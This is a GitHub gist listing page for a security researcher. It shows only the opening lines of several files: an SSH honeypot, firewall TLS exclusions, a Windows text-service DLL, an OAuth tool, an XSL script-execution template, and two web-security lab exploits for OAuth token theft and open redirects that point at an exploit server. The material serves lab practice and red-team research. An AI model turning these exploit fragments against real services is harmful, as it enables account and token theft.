Adam Crosser UNC1739
UNC1739
/ sshoneypot.go
Last active
September 24, 2025 12:14
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "crypto/ed25519" | |
| "crypto/rand" | |
| "errors" | |
| "log" | |
| "net" | |
| "golang.org/x/crypto/ssh" |
UNC1739
/ panw-exclusions.json
Created
August 26, 2025 07:14
Default TLS Exclusions for Palo Alto Networks Firewalls
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "type": "rpc", | |
| "tid": "32", | |
| "action": "PanDirect", | |
| "method": "execute", | |
| "predefinedCacheUpdate": "false", | |
| "cloudCacheUpdate": "false", | |
| "result": { | |
| "result": { | |
| "entry": [ |
UNC1739
/ textservicesframework.cpp
Created
January 31, 2025 15:43
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <atlbase.h> | |
| #include <atlcom.h> | |
| #include <msctf.h> | |
| #include <strsafe.h> | |
| #include <psapi.h> | |
| #pragma comment(lib, "psapi.lib") | |
| #define TEXTSERVICE_DESC L"Universal Text Service" |
UNC1739
/ oauthseeker.go
Created
October 14, 2024 17:42
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "context" | |
| "encoding/json" | |
| "fmt" | |
| "io" | |
| "log" | |
| "net/http" | |
| "os" |
UNC1739
/ update.xsl
Created
July 16, 2024 20:45
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version='1.0'?> | |
| <stylesheet | |
| xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" | |
| xmlns:user="placeholder" | |
| version="1.0"> | |
| <output method="text"/> | |
| <ms:script implements-prefix="user" language="JScript"> | |
| <![CDATA[ | |
| {{ script_code }} | |
| ]]> |
UNC1739
/ gist:15016054b17d68db19f57d3a9da0c4d5
Created
January 26, 2024 21:56
Steal OAuth Access Token Using PostMessage with iFrame
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| </head> | |
| <body> | |
| <iframe id="myIframe" src="https://oauth-0a4600a9033dea90854c98d802540049.oauth-server.net/auth?client_id=l2r7wtvbpn9138gfrh33k&redirect_uri=https://0aac006a037eea5d85ee9a31007c0029.web-security-academy.net/oauth-callback/../post/comment/comment-form&response_type=token&nonce=492252691&scope=openid%20profile%20email" width="600" height="400"></iframe> | |
| <script> | |
| // Function to handle incoming messages | |
| function receiveMessage(event) { |
UNC1739
/ gist:ec0c2261a55308392464a67548c67678
Last active
February 18, 2025 00:05
OAuth RedirectURI to Open Redirect Exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <script> | |
| const clientId = 'mrg1s33zswbvzan5glqj1'; | |
| const oauthServerDomain = 'oauth-0a70007704d9237081a92ded02d500fc.oauth-server.net'; | |
| const redirectUri = 'https://0a0e00d804a723f281952f88004b0071.web-security-academy.net'; | |
| const exploitServerDomain = 'exploit-0a3500fe045423e4819c2ec301bb005c.exploit-server.net'; | |
| // URL encoding the exploit server domain |